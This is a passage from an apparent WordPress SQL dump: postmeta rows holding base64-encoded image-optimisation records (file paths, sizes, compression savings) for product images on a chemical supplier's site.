A4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo1NTMsInRpbWUiOjE0ODM1Nzc3MjcsImlkIjoxMDQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo2NDIsInRpbWUiOjE0ODM1Nzc3MzEsImlkIjoxMDQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo4MTYsInRpbWUiOjE0ODM1Nzc3MzQsImlkIjoxMDQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo4NzMsInRpbWUiOjE0ODM1Nzc3MzgsImlkIjoxMDQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxMTg3LCJ0aW1lIjoxNDgzNTc3NzQyLCJpZCI6MTA0Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (29814, 1044, 'wpfc_optimisation_reduction', '350164'); 
INSERT INTO `wp_postmeta` VALUES (29815, 1044, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLmpwZyIsIndpZHRoIjo1ODEwLCJoZWlnaHQiOjM4NDQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUuanBnIiwicmVkdWN0aW9uIjozNTAxNTAsInRpbWUiOjE0ODM1Nzc3NTQsImlkIjoiMTA0NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3NzU3LCJpZCI6MTA0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtODAweDUyOS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUyOSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtODAweDUyOS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtODAweDUyOS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc3NjEsImlkIjoxMDQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS03Njh4NTA4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTA4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS03Njh4NTA4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS03Njh4NTA4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Nzc2NCwiaWQiOjEwNDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTE2MDB4MTA1OS5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDU5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS0xNjAweDEwNTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTE2MDB4MTA1OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc3NjgsImlkIjoxMDQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Nzc3MSwiaWQiOjEwNDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3Nzc0LCJpZCI6MTA0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc3NzcsImlkIjoxMDQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Nzc4MCwiaWQiOjEwNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc3ODMsImlkIjoxMDQ0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3Nzg1LCJpZCI6MTA0NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Nzc4OCwiaWQiOjEwNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZGVkLXBpcGUtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc3OTEsImlkIjoxMDQ0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWRlZC1waXBlLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3Nzk0LCJpZCI6MTA0NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkZWQtcGlwZS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Nzc5NywiaWQiOjEwNDR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29816, 1040, 'wpfc_optimisation_reduction', '3473696'); 
INSERT INTO `wp_postmeta` VALUES (29817, 1040, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQuanBnIiwid2lkdGgiOjMyMzcsImhlaWdodCI6MzE4MywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQuanBnIiwicmVkdWN0aW9uIjozNDczNDI4LCJ0aW1lIjoxNDgzNTc3ODA5LCJpZCI6IjEwNDAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzgxMiwiaWQiOjEwNDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC04MDB4Nzg3LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6Nzg3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtODAweDc4Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTgwMHg3ODcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3ODE1LCJpZCI6MTA0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTc2OHg3NTUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo3NTUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC03Njh4NzU1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtNzY4eDc1NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc4MTgsImlkIjoxMDQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtMTYwMHgxNTczLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjE1NzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC0xNjAweDE1NzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC0xNjAweDE1NzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3ODIyLCJpZCI6MTA0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTE0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xNC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc4MjUsImlkIjoxMDQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiO